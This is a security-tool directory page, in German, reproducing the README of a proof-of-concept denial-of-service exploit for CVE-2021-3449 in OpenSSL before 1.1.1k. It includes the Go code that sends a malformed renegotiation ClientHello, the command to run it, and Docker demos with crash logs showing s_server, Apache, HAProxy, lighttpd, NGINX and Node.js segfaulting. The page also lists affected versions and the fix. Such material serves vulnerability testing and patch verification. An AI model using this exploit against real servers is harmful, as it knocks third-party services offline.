Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-3449 — CVE-2021-3449 OpenSSL Denial-of-Service-Exploit 👨🏻‍💻 | Kitploit
Tools/GitHubGitHub/riptl/cve-2021-3449
SchwachstellenanalyseExploitationWebsicherheitPenetrationstests
GitHubriptl/cve-2021-3449

cve-2021-3449

CVE-2021-3449 OpenSSL Denial-of-Service-Exploit 👨🏻‍💻

Repository anzeigen
2243712vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3449 OpenSSL <1.1.1k DoS-Exploit

Verwendung: go run . -host hostname:port

Dieses Programm implementiert einen Proof-of-Concept-Exploit von CVE-2021-3449, der OpenSSL-Server vor Version 1.1.1k betrifft, wenn TLSv1.2 sichere Neuverhandlung akzeptiert wird.

Es verbindet sich mit einem TLSv1.2-Server und initiiert sofort eine RFC 5746 "sichere Neuverhandlung". Der Angriff nutzt ein bösartig gestaltetes ClientHello, das den Server zum Absturz bringt, indem eine NULL-Zeiger-Dereferenzierung (Denial-of-Service) verursacht wird.

Referenzen

  • OpenSSL-Sicherheitshinweis
  • cve.mitre.org
  • Ubuntu-Sicherheitshinweis (USN-4891-1)
  • Debian-Sicherheitsverfolgung
  • Red Hat CVE-Eintrag

Dieses Problem wurde am 17. März 2021 von Nokia an OpenSSL gemeldet. Der Fix wurde von Peter Kästle und Samuel Sapalski von Nokia entwickelt.

Abhilfe

Der einzige bekannte Fix ist die Aktualisierung von .

libssl1.1

Obwohl einige Anwendungen standardmäßig gehärtete TLS-Konfigurationen verwenden, die TLS-Neuverhandlung deaktivieren, sind sie dennoch von dem Fehler betroffen, wenn eine alte OpenSSL-Version läuft.

Exploit

main.go ist ein kleines Skript, das eine Verbindung zu einem TLS-Server herstellt, eine Neuverhandlung erzwingt und die Verbindung trennt.

Der Exploit-Code wurde in eine gebündelte Version des Go 1.14.15 encoding/tls-Pakets eingefügt. Sie finden ihn in handshake_client.go:115. Die Logik ist selbsterklärend.

root@kitploit:~
// CVE-2021-3449 Exploit-Code.
if hello.vers >= VersionTLS12 {
    if c.handshakes == 0 {
        println("sende initiales ClientHello")
        hello.supportedSignatureAlgorithms = supportedSignatureAlgorithms
    } else {
        // OpenSSL vor 1.1.1k führt zu einer NULL-Pointer-Dereferenzierung,
        // wenn die supported_signature_algorithms-Erweiterung weggelassen wird,
        // aber supported_signature_algorithms_cert vorhanden ist.
        println("sende bösartiges ClientHello")
        hello.supportedSignatureAlgorithmsCert = supportedSignatureAlgorithms
    }
}

– @terorie

Demo

Das demo/-Verzeichnis enthält Konfigurationen, um verschiedene Anwendungen mit einer anfälligen Version von OpenSSL zu patchen.

Testaufbau:

  • Herunterladen und Kompilieren der anfälligen OpenSSL-Version 1.1.1j lokal
  • Vorbereiten eines Ubuntu 20.04 Zielcontainers und Hochladen der OpenSSL-Bibliotheken
  • Installieren der Anwendung im Zielcontainer
  • Server starten und Angriff ausführen

Voraussetzungen:

  • OpenSSL (auf dem Host)
  • build-essential (Perl, GCC, Make)
  • Docker

Hinweis: Keiner der aufgeführten Webserver ist mit OpenSSL 1.1.1k oder neuer anfällig für CVE-2021-3449.

ServerDistributionVersionDemoErgebnis
OpenSSL s_server-1.1.1jmake demo-opensslAbsturz
Apache2Ubuntu 18.042.4.29make demo-apache2Teilweiser Absturz
HAProxyUbuntu 18.041.8.8make demo-haproxyAbsturz
HAProxyUbuntu 20.042.0.13make demo-haproxyKeine Wirkung
lighttpdUbuntu 18.041.4.55make demo-lighttpdAbsturz
lighttpdUbuntu 20.041.4.55make demo-lighttpdAbsturz
lighttpdUbuntu 21.041.4.59make demo-lighttpdKeine Wirkung mit Konfigurationsoption
NGINXUbuntu 18.041.14.0make demo-nginxTeilweiser Absturz
NGINXUbuntu 20.041.18.0make demo-nginxKeine Wirkung
Node.js <=12Ubuntu 18.04Keine Wirkung
Node.js >12Ubuntu 18.04?make demo-nodejsAbsturz
Node.js >12Ubuntu 18.0415.14.0make demo-nodejsKeine Wirkung

Um alle Demo-Ressourcen zu bereinigen, führen Sie make clean aus.

OpenSSL einfacher Server

Der openssl s_server ist eine minimale TLS-Serverimplementierung.

  • make demo-openssl: Vollständiger Durchlauf (Port 4433)
  • make -C demo build-openssl: Erstellen des Ziel-Docker-Images
  • make -C demo start-openssl: Ziel auf Port 4433 starten
  • make -C demo stop-openssl: Ziel stoppen

Ergebnis: Vollständiger Server-Absturz.

Logs

root@kitploit:~
docker run -d -it --name cve-2021-3449-openssl --network host local/cve-2021-3449/openssl
a16c44f98a37b7e0c0777d3bd66456203de129fd23566d2141ef2bec9777be17
docker logs -f cve-2021-3449-openssl &
sleep 2
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using default temp DH parameters
ACCEPT
sending initial ClientHello
connected
sending malicious ClientHello

[[truncated]]

Program received signal SIGSEGV, Segmentation fault.
0x00007f668bd89283 in tls12_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#0  0x00007f668bd89283 in tls12_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#1  0x00007f668bd893cd in tls1_set_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#2  0x00007f668bd89fe3 in tls1_process_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#3  0x00007f668bd8a110 in tls1_set_server_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#4  0x00007f668bd824a2 in tls_early_post_process_client_hello () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#5  0x00007f668bd84d55 in tls_post_process_client_hello () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#6  0x00007f668bd8522f in ossl_statem_server_post_process_message () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#7  0x00007f668bd710e1 in read_state_machine () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#8  0x00007f668bd7199d in state_machine () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#9  0x00007f668bd71c4e in ossl_statem_accept () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#10 0x00007f668bd493ab in ssl3_read_bytes () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#11 0x00007f668bd504ec in ssl3_read_internal () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#12 0x00007f668bd50595 in ssl3_read () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#13 0x00007f668bd5ae5c in ssl_read_internal () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#14 0x00007f668bd5af5b in SSL_read () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#15 0x000055aa5a10f209 in sv_body ()
#16 0x000055aa5a1302ec in do_server ()
#17 0x000055aa5a114815 in s_server_main ()
#18 0x000055aa5a0f9395 in do_cmd ()
#19 0x000055aa5a0f9ee1 in main ()
malicious handshake failed, exploit might have worked

Apache2 httpd

Der Apache2 httpd-Webserver mit Standardkonfiguration ist anfällig.

  • make demo-apache: Vollständiger Durchlauf (Port 443)
  • make -C demo build-apache: Erstellen des Ziel-Docker-Images
  • make -C demo start-apache: Ziel auf Port 443 starten
  • make -C demo stop-apache: Ziel stoppen

Vielen Dank an @binarytrails für den Beitrag.

Ergebnis: Teilweise Unterbrechung, Hauptprozess noch aktiv, aber Worker-Prozess abgestürzt.

Logs

root@kitploit:~
docker run -d -it --name cve-2021-3449-apache2 --network host local/cve-2021-3449/apache2
0bf38dd8ab721f0ae3713448d2a28050b6e7d11fa7e3174b6ec9b1bbcfa124c8
docker logs -f cve-2021-3449-apache2 &

[[truncated]]

sending initial ClientHello
connected
sending malicious ClientHello
[Sat Mar 27 02:54:38.153327 2021] [ssl:info] [pid 21:tid 140433175750400] [client 127.0.0.1:46846] AH01964: Connection to child 64 established (server localhost:443)
[Sat Mar 27 02:54:38.153619 2021] [ssl:debug] [pid 21:tid 140433175750400] ssl_engine_kernel.c(2317): [client 127.0.0.1:46846] AH02043: SSL virtual host for servername localhost found
[Sat Mar 27 02:54:38.155697 2021] [ssl:debug] [pid 21:tid 140433175750400] ssl_engine_kernel.c(2233): [client 127.0.0.1:46846] AH02041: Protocol: TLSv1.2, Cipher: ECDHE-RSA-CHACHA20-POLY1305 (256/256 bits)
[Sat Mar 27 02:54:38.155781 2021] [ssl:error] [pid 21:tid 140433175750400] [client 127.0.0.1:46846] AH02042: rejecting client initiated renegotiation
[Sat Mar 27 02:54:38.155837 2021] [ssl:debug] [pid 21:tid 140433175750400] ssl_engine_kernel.c(2317): [client 127.0.0.1:46846] AH02043: SSL virtual host for servername localhost found
malicious handshake failed, exploit might have worked: EOF
[Sat Mar 27 02:54:39.183129 2021] [core:notice] [pid 19:tid 140433267538880] AH00051: child pid 21 exit signal Segmentation fault (11), possible coredump in /etc/apache2

HAProxy

HAProxy-Versionen 2.0.13 und höher sind nicht betroffen.

Versionen vor mindestens 1.8.8 sind mit "intermediate" TLS-Konfiguration anfällig.

  • make demo-haproxy: Vollständiger Durchlauf (Port 4433)
  • make -C demo build-haproxy: Erstellen des Ziel-Docker-Images
  • make -C demo start-haproxy: Ziel auf Port 4433 starten
  • make -C demo stop-haproxy: Ziel stoppen

Tests mit Master-Worker-Modus (-W-Flag, Standard auf Debian). Überraschenderweise beendet sich der Master-Prozess, wenn ein Worker-Prozess stirbt.

Ergebnis: Vollständiger Server-Absturz.

Logs

root@kitploit:~
docker run -d -it --name cve-2021-3449-haproxy --network host local/cve-2021-3449/haproxy
1786bd2fc0ed8d8ffb0388fb223a61c9cabdd095cb9908e35ad4c77e1677cda8
docker logs -f cve-2021-3449-haproxy &
sending initial ClientHello
connected
sending malicious ClientHello
malicious handshake failed, exploit might have worked: EOF
[ALERT] 086/075305 (1) : Current worker 7 exited with code 139
[ALERT] 086/075305 (1) : exit-on-failure: killing every workers with SIGTERM
[WARNING] 086/075305 (1) : All workers exited. Exiting... (139)

lighttpd

lighttpd-Versionen 1.4.56 und höher sind nicht anfällig, wenn ssl.disable-client-renegotiation = "enable" in der lighttpd.conf konfiguriert ist.

Der lighttpd-Webserver <= 1.4.55 mit "intermediate" TLS-Konfiguration ist anfällig.

  • make demo-lighttpd: Vollständiger Durchlauf (Port 4433)
  • make -C demo build-lighttpd: Erstellen des Ziel-Docker-Images
  • make -C demo start-lighttpd: Ziel auf Port 4433 starten
  • make -C demo stop-lighttpd: Ziel stoppen

Ergebnis: Vollständiger Server-Absturz.

Logs

root@kitploit:~
docker run -d -it --name cve-2021-3449-lighttpd --network host local/cve-2021-3449/lighttpd
84970c88abb9251e8b92a2fca777c6c23e5e8693dff0ae62c5a363692a859232
docker logs -f cve-2021-3449-lighttpd &
sending initial ClientHello
connected
sending malicious ClientHello
malicious handshake failed, exploit might have worked: EOF
/bin/bash: line 1:     7 Segmentation fault      lighttpd -D -f /etc/lighttpd/lighttpd.conf

NGINX

NGINX-Versionen 1.18.0 und höher sind nicht anfällig.

Der NGINX 1.14.0 Webserver mit üblicher Konfiguration ist anfällig. (https://nginxconfig.io)

NGINX-Versionen >1.15.4 mit OpenSSL >=1.1.1 gelten als in Ordnung, da sie den SSL_OP_NO_RENEGOTIATION-Patch enthalten: http://mailman.nginx.org/pipermail/nginx-devel/2018-September/011461.html

  • make demo-nginx: Vollständiger Durchlauf (Port 4433)
  • make -C demo build-nginx: Erstellen des Ziel-Docker-Images
  • make -C demo start-nginx: Ziel auf Port 4433 starten
  • make -C demo stop-nginx: Ziel stoppen

Ergebnis: Teilweise Unterbrechung, Hauptprozess noch aktiv, aber Worker-Prozess abgestürzt.

Logs

root@kitploit:~
docker run -d -it --name cve-2021-3449-nginx --network host local/cve-2021-3449/nginx
ccba15530df5ba3d74a584a8c62d4e88deb33203fc5dee6c3c3387b132861f70
docker logs -f cve-2021-3449-nginx &
sending initial ClientHello
connected
sending malicious ClientHello
malicious handshake failed, exploit might have worked: EOF
2021/03/27 03:24:40 [alert] 7#7: worker process 8 exited on signal 11 (core dumped)

Node.js

Node.js https.createServer() ist anfällig.

  • make demo-nodejs: Vollständiger Durchlauf (Port 4433)
  • make -C demo build-nodejs: Erstellen des Ziel-Docker-Images
  • make -C demo start-nodejs: Ziel auf Port 4433 starten
  • make -C demo stop-nodejs: Ziel stoppen

Ergebnis: Vollständiger Server-Absturz.

Logs

root@kitploit:~
server started
sending initial ClientHello
connected
sending malicious ClientHello

Thread 1 "node" received signal SIGSEGV, Segmentation fault.
0x000000000160714e in tls1_process_sigalgs ()
#0  0x000000000160714e in tls1_process_sigalgs ()
#1  0x00000000016074b3 in tls1_set_server_sigalgs ()
#2  0x00000000016007dd in tls_post_process_client_hello ()
#3  0x00000000015ef692 in state_machine.part ()
#4  0x00000000015c1a6d in ssl3_read_bytes ()
#5  0x00000000015ca2c7 in ssl3_read ()
#6  0x00000000015d6491 in SSL_read ()
#7  0x0000000000c35332 in node::crypto::TLSWrap::ClearOut() ()
#8  0x0000000000c35f10 in node::crypto::TLSWrap::OnStreamRead(long, uv_buf_t const&) ()
#9  0x0000000000b6cad8 in node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) ()
#10 0x00000000014842d7 in uv__read (stream=stream@entry=0x5df10f0) at ../deps/uv/src/unix/stream.c:1239
#11 0x0000000001484c90 in uv__stream_io (loop=<optimized out>, w=0x5df1178, events=1) at ../deps/uv/src/unix/stream.c:1306
#12 0x000000000148b775 in uv.io_poll () at ../deps/uv/src/unix/linux-core.c:462
#13 0x0000000001479318 in uv_run (loop=0x45a1020 <default_loop_struct>, mode=UV_RUN_DEFAULT) at ../deps/uv/src/unix/core.c:385
#14 0x00000000009d2025 in node::SpinEventLoop(node::Environment*) ()
#15 0x0000000000ac8b90 in node::NodeMainInstance::Run(node::EnvSerializeInfo const*) ()
#16 0x0000000000a4f73a in node::Start(int, char**) ()
#17 0x00007efe747dcbf7 in __libc_start_main (main=0x9cbbd0 <main>, argc=2, argv=0x7fff42035238, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fff42035228) at ../csu/libc-start.c:310
#18 0x00000000009ce26c in _start ()
malicious handshake failed, exploit might have worked: EOF

Copyright

Dieses Repository enthält das encoding/tls-Paket der Programmiersprache Go.

root@kitploit:~
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
Tool herunterladen